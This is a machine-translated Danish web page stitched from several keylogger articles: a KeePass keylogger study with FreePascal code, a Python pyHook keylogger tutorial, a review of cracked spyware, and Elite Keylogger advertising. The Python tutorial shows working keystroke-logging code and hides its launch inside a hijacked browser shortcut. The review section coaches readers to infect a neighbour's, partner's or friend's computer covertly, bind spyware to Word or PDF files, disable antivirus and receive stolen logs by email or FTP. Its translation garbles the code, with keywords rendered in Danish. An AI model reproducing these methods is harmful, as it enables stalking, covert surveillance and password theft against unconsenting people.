• hjem
  •  > 
  • Diske og filer
  •  > 
  • Keylogger online. Har du brug for en keylogger? To typer keyloggere og hvordan de påvirker din computer

Keylogger online. Har du brug for en keylogger? To typer keyloggere og hvordan de påvirker din computer

Keylogger er et program, der læser tasterne, der trykkes på, og gemmer dem i en fil. I fremtiden kan du se, hvad personen skrev ved computeren, hvilke beskeder han skrev, og hvilke adgangskoder han indtastede. Et andet navn for en keylogger er en keylogger, fra det engelske "keylogger", som bogstaveligt betyder "optageknapper".

I NeoSpy-programmet er keylogger-funktionen aktiveret som standard; i denne tilstand optager programmet tekst, genvejstastkombinationer og adgangskoder indtastet på tastaturet. Håndtering af keylogger-indstillinger er placeret i menuen "Sporingsindstillinger" - "Logoptagelse" - "Tastatur". Du kan vælge en af ​​programmets to driftstilstande: standard og alternativ. Det anbefales at bruge standardindstillingen 99% af tiden, men hvis der er en konflikt med din antivirussoftware, kan du aktivere den alternative tilstand.

Opsætning af en keylogger


Tastaturloggen registreres altid i fuldt format, inklusive servicenøgler. Et eksempel på en sådan log kan ses på illustrationen. Når du ser rapporten, kan du deaktivere visningen af ​​tegn, der ikke kan udskrives, og se loggen som simpel tekst, mere tilgængelig for gratis læsning.


Keylogger eksempel

For at gøre arbejdet med rapporter lettere, er indtastede adgangskoder fremhævet på listen over tastetryk. På denne måde kan du finde ud af dit barns adgangskoder og om nødvendigt beskytte ham mod uønskede bekendtskaber. Hvis NeoSpy-programmet bruges på en virksomhed til at overvåge medarbejdere, så er indsamling af personlige data og korrespondance forbudt i henhold til lovgivningen i de fleste lande, så denne mulighed skal deaktiveres, eller medarbejderen skal underrettes skriftligt om kontrol af ledelsen og uantageligheden af ​​at bruge en computer i organisationen til personlig korrespondance.

For at kontrollere sikkerheden af ​​adgangskoder indtastet via KeePass, besluttede jeg at skrive en simpel keylogger med yderligere datafangst fra udklipsholderen. Hele koden tog et par linjer i FreePascal.

Adgangskoder, uden yderligere sikkerhedsforanstaltninger og korrekt konfiguration af KeePass, viste sig at være ret sårbare.

Keylogger-koden placeres i en Timer-loop, som opdateres hver 10. ms. Anvendte moduler: Windows og ClipBrd.

//Sammenlign den aktuelle tilstand af tasterne for f:= 0 til 255 do if a[f]<>GetAsyncKeyState(f) derefter begynde //Reaktion på at trykke på en tast hvis KeePass.Checked og (GetAsyncKeyState(f) = 0) derefter Memo1.Caption:= Memo1.Caption + chr(f); //Reaktion på tastetryk, hvis ikke KeePass.Checked og (GetAsyncKeyState(f)<>0) derefter Memo1.Caption:= Memo1.Caption + chr(f); ende; //Gem den aktuelle tilstand af nøglerne i et array for f:= 0 til 255 do a[f] := GetAsyncKeyState(f); //Skriv, når der foretages ændringer i udklipsholderen, hvis s<>Clipboard.AsText begynder derefter s:= Clipboard.AsText; Memo2.Caption:= Memo2.Caption + s + " "; ende;
Simple Logger-programmet ser sådan ud:

Vinduet -Tastatur- viser taster uden hensyn til store og små bogstaver og inputsprog. Symbolet, hvis nummer er lig med nøglekoden, vises: chr(f). Programmet kan ændres til at vise alle symboler korrekt, men dette er ikke påkrævet til denne undersøgelse.

Kopiering til vinduet -Udklipsholder- sker, når indholdet af bufferen ændres.

Svagheder ved KeePass og deres eliminering

1. Indtast hovedadgangskoden

Som standard indtastes hovedadgangskoden i KeePass uden sikker tilstand, så den let kan bestemmes i Simple Logger. Dette er det mest kritiske sted i sikkerhed, fordi... her får vi adgang til hele adgangskodedatabasen på én gang.

For at løse problemet skal du aktivere sikkerhedsindstillingen "Indtast hovedadgangskoden i beskyttet tilstand (svarende til UAC i Windows Vista og nyere)." Denne tilstand forhindrer loggeren i at få adgang til tastaturet. Derudover er det umuligt at tage et skærmbillede for at bestemme placeringen af ​​nøglefilen.

Denne tilstand aktiveres kun, når hovedadgangskoden indtastes. Beskyttelsen af ​​andre adgangskoder vil blive diskuteret yderligere.

2. Udklipsholder

Simple Logger reagerer på udklipsholderændringer 100 gange i sekundet. At indtaste adgangskoden i bufferen og derefter slette den efter et par sekunder giver således ikke beskyttelse i dette tilfælde.

For at løse dette problem kan du bruge AutoDial.

3. Automatisk opkald

Svaret på KeePass-autoopkald sker ved at trykke på en tast, ikke ved at trykke på den. Dette giver dig mulighed for at få beskyttelse fra nogle keyloggere. For at komme uden om dette har Simple Logger en ekstra indstilling: "KeePass Auto-Type". Hvis den er tændt, udløses loggeren, når der trykkes på en tast.

Ved automatisk opkald via KeePass: Mit LoginNavn LongPassword123

En post vises i Simple Logger:

Simple Logger tager ikke hensyn til tastaturgenveje på nogen måde. Som du kan se, vises Shift-tasten som et specialtegn (svarende til "+") og "?". Skift frigives både før og efter et stort bogstav. Dette er dog nok til at forstå adgangskoden.

For at løse dette problem kan du bruge indstillingen "Dobbelt autoopkaldskompleksitet" i KeePass. I dette tilfælde vil KeePass indtaste en del af adgangskoden fra tastaturet og dele gennem udklipsholderen og blande værdierne. Dette giver dig mulighed for at omgå nogle keyloggere.

Simple Logger vil reagere på dobbelt komplikation af autoopkald som følger:

  • Indsæt fra udklipsholderen "Ctrl + V" blev vist som "V◄?";
  • Venstre pil – "%" (nøglekode og symbol #37);
  • Højre pil – """ (nøglekode og symbol #39).
Du kan skrive en lille algoritme og gendanne den korrekte adgangskode ved hjælp af data fra begge vinduer. Denne indstilling komplicerer keyloggerens arbejde, men garanterer ikke beskyttelse - adgangskoden kan let gendannes, hvis det ønskes.

Yderligere beskyttelsesforanstaltninger kan hjælpe mod en keylogger designet til KeePass.

4. Yderligere beskyttelse

Nogle softwarepakker har funktioner som:
  • Beskyttelse af datainput fra et hardwaretastatur;
  • Sikker browser.
Når du aktiverer datainputbeskyttelse fra et hardwaretastatur, kan Simple Logger ikke længere modtage data fra KeePass auto-typing, hvis det indtastes i adgangskodeformularen i browseren. I dette tilfælde vil det svage punkt arbejde gennem udklipsholderen.

Når du brugte en beskyttet browser, var det ikke muligt at få adgang til klippebordet og tastaturet ved hjælp af Simple Logger. Derudover var der ingen måde at tage skærmbilleder på.

I stedet for en konklusion

Efter at have set på, hvordan vores medarbejdere bruger KeePass, fandt jeg ud af, at nogle:
  • brug ikke UAC;
  • brug ikke autodialer, blot kopiering af adgangskoder gennem en buffer;
  • lade programmet være åbent, når du forlader arbejdspladsen;
  • bruge standardindstillinger uden at konfigurere sikkerhedspolitik.
Jeg er leder i en lille virksomhed, jeg er lidt interesseret i programmering. Jeg er ikke teknisk eller sikkerhedsekspert, så jeg ville blive glad, hvis mere erfarne specialister påpeger manglerne ved min lille forskning.

Jeg testede den seneste version af KeePass 2.36 på Windows 8.1. For at være retfærdig skal det bemærkes, at dette problem ikke kun er et KeePass-problem. Der er mange andre adgangskodeholdere med større eller mindre grad af pålidelighed, men dette er et emne for en anden undersøgelse.

Links

  1. Simpel Logger på GitHub
    //Hvem bekymrer sig, du kan finde en exe-fil i "SimpleLogger_for_Win64.7z"-arkivet. Programmet tillader ikke fuld keylogging; det er beregnet til sikkerhedsforskning og informationsformål.
UPD (27/07/2017)

Browser plugin

Som bruger dartraiden bemærkede, er det muligt at bruge modulet KeepPassHttp sammen med browsertilføjelse PassIFox eller ChromeIPass. Dette plugin (ifølge udvikleren) giver sikker eksponering af KeePass-poster over HTTP.

Denne kombination giver dig mulighed for automatisk at udfylde dit login og adgangskode i browseren, når KeePass er låst op. Simple Logger reagerer ikke på nogen måde i dette tilfælde.

Det svage punkt ved ChromeIPass er genereringen af ​​en ny adgangskode, fordi... den kopieres via udklipsholderen og er synlig på skærmen. I dette tilfælde er det bedre at generere en ny adgangskode i KeePass selv.

Oprettelse af en ny hovedadgangskode

Som bemærket af arthur_veber:
Ved udskiftning af hovedadgangskoden, samt ved oprettelse af en ny, bruges sikker tilstand ikke.

I dette tilfælde opsnapper Simple Logger hovedadgangskoden, der er indtastet i KeePass.

Det hjælper heller ikke det virtuelle skærmtastatur fra en kendt producent, der ligesom KeePass autodialer fungerer ud fra en tastetrykshændelse.

Det er svært at give råd her. Vi skal nok henlede udviklernes opmærksomhed på dette problem.

Andre angrebsmidler

Som brugeren qw1 var den første til at påpege, hvis systemet, som KeePass er installeret på, er kompromitteret, kan andre angrebsmidler end keyloggeren bruges. I dette tilfælde vil listen over handlinger for at imødegå angrebet afhænge af den specifikke situation.

Desværre er det umuligt i én artikel at dække alle de sikkerhedsforanstaltninger, der er nødvendige for at gemme adgangskoder.

Hej, QUAZAR er her igen. I dag vil jeg vise dig, hvordan du opretter en simpel keylogger i Python. Selvfølgelig kan denne keylogger ikke konkurrere med sådanne giganter som, men på trods af dette kan den finde sin brug.

Hvad er en keylogger?

Du kan læse detaljeret om, hvad en keylogger er og om typerne af keyloggere i artiklen "". For at finde yderligere materialer om emnet, brug webstedssøgningen, som er placeret i øverste højre hjørne. Indtast blot ordet "keylogger" eller "keylogger".

Simpel keylogger i Python

For at oprette en keylogger har vi brug for:

  • Operativsystem: Windows eller MacOs (enhver Linux kan også bruges, men jeg har ikke prøvet det personligt)
  • Python installeret på målmaskinen, samt specielle biblioteker.

Dette materiale er kun til informationsformål. Oplysningerne i denne artikel er kun givet til informationsformål. Hverken redaktørerne af webstedet www.site eller forfatteren af ​​publikationen bærer noget ansvar for nogen skade forårsaget af materialet i denne artikel.

Oprettelse af en simpel keylogger i Python

Først skal du downloade og installere Python.


Simpel keylogger i Python

Efter installation af Python, skal du installere modulerne "pyHook" og "pywin32". På denne side finder du 32 og 64 bit versioner til Windows og andre operativsystemer. Download "PYhook" og "pyWin32" i henhold til din installerede version af Python og Windows (32bit eller 64bit).


Keylogger i Python. PYhook modul
Keylogger i Python. pyWin32 modul

Når den er downloadet, skal du installere og åbne menuen IDLE (Python GUI) fra menuen Start.

Simpel keylogger i Python

Gå til menuen "Filer", og klik på punktet "Ny fil". Indsæt derefter keylogger-koden:

#Navn: QUAZAR
#Websted: www.websted
importere pyHook, pythoncom, sys, logning
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(hændelse):
logging.basicConfig(filnavn=fil_log, niveau=logning.DEBUG, format="%(meddelelse)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
returner Sandt
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

Og gem det ved at kalde filen Keylogger.pyw. Du skal bare ikke gemme filen i rodmappen C: hvor du skal bruge administratorrettigheder til at kopiere og slette filer. Opret en ny mappe på dit C:-drev eller et andet sted, hvor du ikke behøver administratorrettigheder for at kopiere filer og gemme Keylogger.pyw der.

Du kan vælge en hvilken som helst placering som outputrapportfilen “file_log = “C:keyloggerlog.txt”, men helst, selvfølgelig, en skjult placering på din harddisk. I dette eksempel vil jeg gemme rapportfilen på disk i rodmappen C:. Jeg har jo ikke noget at skjule.

Automatisk lancering af en keylogger i Python

Keyloggeren er klar. Nu skal vi sikre os, at keyloggeren starter skjult for brugeren og automatisk, når Windows starter. Dette kan implementeres på forskellige måder. Lad os prøve at gøre det ved hjælp af en bat-fil ved at linke lanceringen af ​​keyloggeren til et eller andet program eller ved at registrere det i opstart.

Først skal du oprette en bat-fil. Kopiér og indsæt følgende kode i Notesblok:

:: Navn: QUAZAR
:: Hjemmeside: www.site
@ekko slukket
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

I den første linje skal du indtaste stien til filen keylogger.pyw (i mit tilfælde "C:keylogger.pyw"). I anden linje skal du indtaste stien til det program, som brugeren normalt bruger (i mit tilfælde Opera-browseren).

Efter redigering skal du gemme filen med filtypenavnet .bat (i mit tilfælde logger.bat) på et skjult sted på din computer (i mit tilfælde i "C:keylogger.bat").

Gå nu til skrivebordet og vælg en genvej til et ofte brugt program (i mit tilfælde er dette Opera-browseren). Højreklik med musen for at åbne kontekstmenuen og gå til genvejsegenskaberne. I feltet "Objekt" skal du indtaste stien til keylogger-bat-filen "C:keyloggerlogger.bat".

Når du har foretaget ændringer, ændres genvejsikonet også. Men dette kan nemt løses på fanen Egenskaber (se skærmbilledet ovenfor).

Hvem af os har ikke ønsket at føle sig som en sej hacker mindst én gang og bryde mindst noget? :) Selv hvis ikke, så lad os tale om, hvor fantastisk det ville være at få en adgangskode fra din mail/sociale netværk. netværket af en ven, kone/mand, roommate tænkt mindst én gang af alle. :) Ja, og man skal jo starte et sted! En væsentlig del af angreb (hacking) involverer inficering af ofrets computer med såkaldte keyloggere (spyware).

Så i dagens artikel vil vi tale om, hvad der er gratis programmer til overvågning af Windows-baserede computere, hvor du kan downloade deres fulde versioner, hvordan man inficerer et offers computer med dem, og hvad er funktionerne ved deres brug.

Men først en lille introduktion.

Hvad er keyloggere, og hvorfor er de nødvendige?

Jeg tror, ​​du selv har gættet, hvad det er. Som regel er de en slags program, der er skjult (selvom dette ikke altid er tilfældet) installeret på ofrets computer, hvorefter det registrerer absolut alle tastetryk på denne node. Ud over selve klikkene bliver følgende normalt registreret: datoen og klokkeslættet for klikket (handlingen) og programmet, hvori disse handlinger blev udført (browser, inklusive webstedsadressen (hurra, vi ser straks, hvad adgangskodene er er til!); lokal applikation; systemtjenester (inklusive Windows-login-adgangskoder) osv.).

Herfra er et af problemerne umiddelbart synligt: ​​Jeg fik adgang til min nabos computer i et par minutter, og jeg vil gerne have hendes adgangskode fra VK! Jeg installerede mirakelprogrammet og returnerede computeren. Hvordan kan jeg slå adgangskoder op senere? Leder du efter en måde at tage computeren fra hende igen? Den gode nyhed er: normalt ikke. De fleste keyloggere er i stand til ikke kun at gemme hele den akkumulerede database af handlinger lokalt, men også at sende den eksternt. Der er mange muligheder for at sende logfiler:

  • En fast e-mail (der kan være flere) er den mest bekvemme mulighed;
  • FTP-server (hvem har det);
  • SMB-server (eksotisk og ikke særlig praktisk).
  • Et fast flashdrev (du indsætter det i USB-porten på ofrets computer, og alle logfiler kopieres der automatisk i usynlig tilstand!).

Hvorfor er alt dette nødvendigt? Jeg synes, svaret er indlysende. Ud over den banale tyveri af adgangskoder kan nogle keyloggere gøre en række andre gode ting:

  • Logning af korrespondance i specificerede sociale netværk. netværk eller instant messengers (for eksempel Skype).
  • Tager skærmbilleder af skærmen.
  • Se/optag webcam-data (hvilket kan være meget interessant).

Hvordan bruger man keyloggere?

Og det er et svært spørgsmål. Du skal forstå, at det ikke er nok at finde en praktisk, funktionel, god keylogger.

Så, hvad skal der til for at et spionprogram kan fungere med succes?:

  • Administratoradgang til en fjerncomputer.
    Desuden betyder dette ikke nødvendigvis fysisk adgang. Du kan nemt få adgang til det via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin osv.
    Som regel er de største vanskeligheder forbundet med dette punkt. Jeg skrev dog for nylig en artikel om, hvordan man får administratorrettigheder i Windows.
  • Anonym e-mail / ftp (som du ikke vil blive identificeret med).
    Selvfølgelig, hvis du bryder tante Shura for din nabo, kan dette punkt sikkert udelades. Som det er tilfældet, hvis du altid har ofrets computer ved hånden (ala, find ud af din bror/søsters adgangskoder).
  • Mangel på fungerende antivirus / interne Windows-beskyttelsessystemer.
    De fleste offentlige keyloggere (som vil blive diskuteret nedenfor) er kendt af langt de fleste antivirussoftware (selvom der er loggervirus, der er indbygget i OS-kernen eller systemdriveren, og antivirus kan ikke længere opdage eller ødelægge dem, selvom de har opdagede dem). På grund af ovenstående vil antivirussoftware, hvis nogen, skulle destrueres nådesløst. Ud over antivirus, udgør systemer som Windows Defender (disse først dukkede op i Windows 7 og senere) også en fare for vores spyware. De registrerer mistænkelig aktivitet i software, der kører på en computer. Du kan nemt finde information om, hvordan du slipper af med dem på Google.

Disse er måske alle de nødvendige og tilstrækkelige betingelser for din succes med at stjæle andres adgangskoder / korrespondance / fotos eller hvad du ellers ønsker at gribe ind i.

Hvilke typer spyware findes der, og hvor kan jeg downloade dem?

Så lad os begynde gennemgangen af ​​de vigtigste keyloggere, som jeg brugte i min daglige praksis med links til gratis downloads af deres fulde versioner (dvs. alle versioner er de seneste i øjeblikket (som det er muligt at finde en kur for) og med allerede fungerer og testede revner).

0. Rotten!

Bedømmelser (ud af 10):

  • Stealth: 10
  • Bekvemmelighed/brugervenlighed: 9
  • Funktionalitet: 8

Det er bare en bombe, ikke en keylogger! I funktionsdygtig stand tager det 15-20 KB. Hvorfor blive overrasket: det er skrevet udelukkende i assemblersprog (veteranprogrammører fælder tårer) og for det meste skrevet af entusiastiske hackere, på grund af hvilket niveauet af dets hemmeligholdelse simpelthen er fantastisk: det fungerer på OS-kerneniveau!

Derudover indeholder pakken FileConnector - et miniprogram, der giver dig mulighed for at forbinde denne keylogger med absolut ethvert program. Det resulterer i, at du får en ny exe i næsten samme størrelse, og når den er lanceret, fungerer den præcis som det program, du limede den sammen med! Men efter den første lancering vil din keylogger automatisk blive installeret i usynlig tilstand med de parametre for afsendelse af logfiler, som du tidligere har angivet. Praktisk, ikke?

En glimrende mulighed for social engineering (medbring en spilfil/præsentation til en ven på et flashdrev eller endda bare et Word-dokument (jeg fortæller dig, hvordan du opretter en exe-fil, der starter en specifik word/excel-fil i en af mine næste artikler), lancering, alt er fint og vidunderligt, men vennen er allerede usynligt inficeret!). Eller du sender simpelthen denne fil til en ven via mail (helst et link til at downloade den, da moderne mailservere forbyder at sende exe-filer). Der er selvfølgelig stadig en risiko fra antivirus under installationen (men den vil ikke eksistere efter installationen).

I øvrigt kan du ved hjælp af nogle andre teknikker lime enhver skjult installationsdistribution sammen (disse findes i The Rat! og Elite keylogger) ikke kun med exe-filer (som stadig vækker mistanke blandt endnu mere eller mindre avancerede brugere), men også med almindelige word / excel og endda pdf-filer! Ingen vil nogensinde tænke noget om en simpel pdf, men det er ikke tilfældet! :) Hvordan dette gøres er emnet for en hel separat artikel. De, der er særligt ivrige, kan skrive spørgsmål til mig gennem feedbackformularen. ;)

Samlet set The Rat! kan beskrives i meget lang tid og meget. Dette blev gjort meget bedre end mig. Der er også et downloadlink der.

1. Elite keylogger

Bedømmelser (ud af 10):

  • Stealth: 10
  • Bekvemmelighed/brugervenlighed: 9
  • Funktionalitet: 8

Måske en af ​​de bedste keyloggere, der nogensinde er skabt. Dens muligheder, udover standardsættet (aflytning af alle klik i forbindelse med applikationer/vinduer/websteder), inkluderer opsnapning af instant messenger-beskeder, billeder fra et webcam og også - hvilket er MEGET vigtigt! - aflytning af WinLogon service adgangskoder. Med andre ord opsnapper det Windows login-adgangskoder (inklusive domæne!). Dette blev muligt takket være dets arbejde på systemdriverniveau og lancering selv ved OS-startstadiet. På grund af den samme funktion forbliver dette program fuldstændig usynligt for både Kasperosky og al anden anti-malware-software. Helt ærligt har jeg ikke mødt en eneste keylogger, der er i stand til dette.

Du skal dog ikke snyde dig selv for meget. Selve installationsprogrammet genkendes meget nemt af antivirus, og for at installere det skal du have administratorrettigheder og deaktivere alle antivirustjenester. Efter installationen vil alt under alle omstændigheder fungere perfekt.

Derudover introducerer den beskrevne funktion (der arbejder på OS-kerneniveau) krav til den OS-version, som keyloggerne vil arbejde på. Version 5-5.3 (links til nedenfor) understøtter alt til og med Windows 7. Win 8/10 samt Windows-serverfamilien (2003/2008/2012) understøttes ikke længere. Der er version 6, som fungerer perfekt, inkl. på sejr 8 og 10 er det dog i øjeblikket ikke muligt at finde en cracket version. Det vil formentlig dukke op i fremtiden. I mellemtiden kan du downloade Elite keylogger 5.3 fra linket ovenfor.

Der er ingen netværksdriftstilstand, derfor er den ikke egnet til brug af arbejdsgivere (til at overvåge deres ansattes computere) eller en hel gruppe mennesker.

Et vigtigt punkt er muligheden for at oprette en installationsdistribution med foruddefinerede indstillinger (for eksempel med en specificeret e-mailadresse, hvor logfiler skal sendes). På samme tid får du i slutningen et distributionssæt, der, når det startes, ikke viser absolut nogen advarsler eller vinduer, og efter installationen kan det endda ødelægge sig selv (hvis du markerer den relevante mulighed).

Flere skærmbilleder af version 5 (for at vise, hvor smukt og praktisk alt er):

2. Alt-i-én keylogger.

Bedømmelser (ud af 10):

  • Stealth: 3
  • Bekvemmelighed/brugervenlighed: 9
  • Funktionalitet: 8

Det er også en meget, meget praktisk ting. Funktionaliteten er helt på niveau med Elite keylogger. Det går værre med hemmeligholdelse. Winlogon-adgangskoder opsnappes ikke længere, det er ikke en driver og er ikke indbygget i kernen. Det er dog installeret i system- og skjulte AppData-mapper, som ikke er så let tilgængelige for uautoriserede brugere (ikke dem på hvis vegne det er installeret). Ikke desto mindre gør antivirus før eller siden med succes dette, hvilket gør denne ting ikke særlig pålidelig og sikker, når den bruges, for eksempel på arbejdet for at spionere på dine egne overordnede. ;) At lime den til noget eller kryptere koden for at skjule den fra antivirus virker ikke.

Virker på enhver version af Win OS (hvilket er godt og praktisk).

Hvad angår resten, er alt fint: det logger alt (undtagen Windows-login-adgangskoder), sender det hvor som helst (inklusive e-mail, ftp, fast flashdrev). Med hensyn til bekvemmelighed er alt også fremragende.

3. Spytech SpyAgent.

Bedømmelser (ud af 10):

  • Stealth: 4
  • Bekvemmelighed/brugervenlighed: 8
  • Funktionalitet: 10

Også en god keylogger, dog med tvivlsom hemmeligholdelse. Understøttede OS-versioner er også alle mulige. Funktionaliteten ligner tidligere muligheder. Der er en interessant selvdestruktionsfunktion efter en bestemt periode (eller når en forudbestemt dato).

Derudover er det muligt at optage video fra et webcam og lyd fra en mikrofon, hvilket også kan være meget populært, og som de to foregående repræsentanter ikke har.

Der er en netværksfunktion, som er praktisk til at overvåge et helt netværk af computere. Forresten, StaffCop har det (det er ikke inkluderet i anmeldelsen på grund af dets ubrugelighed for én bruger - en enkeltperson). Måske er dette program ideelt for arbejdsgivere til at udspionere deres ansatte (selvom lederne på dette område ubetinget er StaffCop og LanAgent - hvis du er en juridisk enhed, så sørg for at se i deres retning). Eller for at holde styr på dit afkom, der elsker at sidde og se "voksensider". De der. hvor det, der skal til, ikke er skjul, men bekvemmelighed (inklusive en bunke smukke log-rapporter osv.) og funktionalitet til at blokere bestemte sider/programmer (SpyAgent har det også).

4. Spyrix Personlig skærm.

Bedømmelser (ud af 10):

  • Stealth: 4
  • Bekvemmelighed/brugervenlighed: 6
  • Funktionalitet: 10

Funktionaliteten er på niveau med den tidligere kandidat, men de samme problemer med hemmeligholdelse. Derudover inkluderer funktionaliteten en interessant ting: kopiering af filer fra USB-drev indsat i computeren, samt fjernvisning af logfiler via en webkonto på Spyrix-webstedet (men vi skal downloade en cracket version, så det vil ikke arbejde for os).

5. Spyrix Personlig skærm.

Bedømmelser (ud af 10):

  • Stealth: 3
  • Bekvemmelighed/brugervenlighed: 6
  • Funktionalitet: 8

Jeg vil ikke beskrive det i detaljer, fordi... denne instans har ikke noget, som en af ​​de tidligere spioner ikke havde, men nogen kan lide denne keylogger (i det mindste for dens grænseflade).

Hvad ender vi med?

Spørgsmålet om at bruge en keylogger er mere etisk end teknisk, og det afhænger meget af dine mål.

Hvis du er en arbejdsgiver, der ønsker at kontrollere sine medarbejdere, er du velkommen til at oprette StaffCop, indhente skriftlig tilladelse fra alle medarbejdere til sådanne handlinger (ellers kan du blive alvorligt sigtet for sådanne ting), og jobbet er i bagagen. Selvom jeg personligt kender mere effektive måder at øge mine medarbejderes præstation på.

Hvis du er en nybegynder IT-specialist, der bare gerne vil opleve, hvordan det er at knække nogen - og hvordan denne ting fungerer generelt, så væbn dig selv med social engineering-metoder og udfør test på dine venner ved at bruge et af de angivne eksempler. Husk dog: Opdagelsen af ​​en sådan aktivitet af ofre bidrager ikke til venskab og lang levetid. ;) Og du bør bestemt ikke teste dette på dit arbejde. Mærk mine ord: Jeg har erfaring med dette. ;)

Hvis dit mål er at spionere på din ven, mand, nabo, eller måske du endda gør det regelmæssigt og for penge, så tænk grundigt over, om det er det værd. Når alt kommer til alt, kan de før eller siden tiltrække. Og det er ikke det værd: "at rode i en andens snavsede vasketøj er ikke en behagelig fornøjelse." Hvis du stadig har brug for det (eller arbejder du måske med at efterforske computerkriminalitet, og sådanne opgaver er en del af dit faglige ansvar), så er der kun to muligheder: Rotten! og Elite Keylogger. I tilstanden med skjulte installationsdistributioner, limet med word / excel / pdf. Og det er bedre, hvis det er muligt, krypteret med en ny kryptor. Kun i dette tilfælde kan vi garantere sikrere aktiviteter og reel succes.

Men under alle omstændigheder er det værd at huske på, at den kompetente brug af keyloggere kun er et lille led i at nå målet (herunder endda et simpelt angreb). Du har ikke altid administratorrettigheder, du har ikke altid fysisk adgang, og ikke alle brugere vil åbne, læse og endnu mere, så download dine vedhæftede filer/links (hej social engineering), antivirussen vil ikke altid være deaktiveret /din keylogger/kryptering vil ikke altid være ukendt for dem . Alle disse og mange utallige problemer kan løses, men deres løsning er emnet for en hel række separate artikler.

Kort sagt, du er lige begyndt at dykke ned i den komplekse, farlige, men utroligt interessante verden af ​​informationssikkerhed. :)

Med venlig hilsenLysyak A.S.

Elite Keylogger registrerer alle adgangskoder indtastet på computeren, mens de forbliver fuldstændig usynlige for brugerne! Du vil være i stand til at opsnappe adgangskoder, dokumenter, e-mails, chatbeskeder og meget mere.

Adgangskoder

Elite Keylogger fungerer i lav-niveau driver-tilstand og starter før Windows-systemet, som giver dig mulighed for at finde ud af adgangskoder og logins. Bemærk venligst, at Mac-versionen ikke kan optage OS X-login-adgangskoder.

Optagelse af chats og mail

Elite Keylogger til Windows optager chats og onlinemeddelelser fra mange forskellige klienter, herunder MSN, AOL, ICQ, AIM, GTalk, Skype. Elite Keylogger til Mac kan optage samtaler fra Skype, Viber, iChat/Messages og Adium samt udgående e-mail på begge sider.

Netværk keylogger

Elite Keylogger er en ideel løsning til fjerncomputerovervågning. Du skal blot installere det én gang - og rapporter vil blive sendt til dig via e-mail eller uploadet til en FTP-server. Dette gør dette værktøj ideelt til virksomheder, der kræver medarbejders computerovervågning. Denne applikation er fuldstændig usynlig og kan ikke registreres af antivirus- eller antispywaresoftware (hvis den er installeret korrekt).

Den bedste hjemmeside aflytning

Elite Keylogger er et af de bedste spywareprogrammer på grund af dets evne til at registrere webstedsbesøg for ALLE populære browsere. Det fanger fuldstændigt webstedsadresser i Internet Explorer, Firefox, Safari, Opera, Google Chrome og andre browsere. Hver hjemmesideadresse logges sammen med et tidsstempel for besøget, så du nemt kan overvåge dine børns internetaktivitet for at sikre, at de er sikre.

Venlig grænseflade

Det er så nemt at bruge. Installationen er hurtig og smertefri, selv for begyndere. For dem, der har brug for det, giver Elite Keylogger mere avancerede muligheder såsom fjerninstallation eller præ-konfiguration. Bare installer og du kan konfigurere og aktivere den på få minutter. Du skal bare angive, hvordan du gerne vil modtage logs - og du behøver ikke længere at røre ved spyware-administratorgrænsefladen, for nu vil den gøre alt automatisk!

Mange muligheder for at sende rapporter

Elite Keylogger giver mange rapporteringsmuligheder. De kan sendes til dig via e-mail, uploades til FTP, overføres til en anden computer på det lokale netværk eller hemmeligt kopieres til et USB-drev. Der er ingen begrænsninger på størrelsen af ​​logs beregnet til transmission.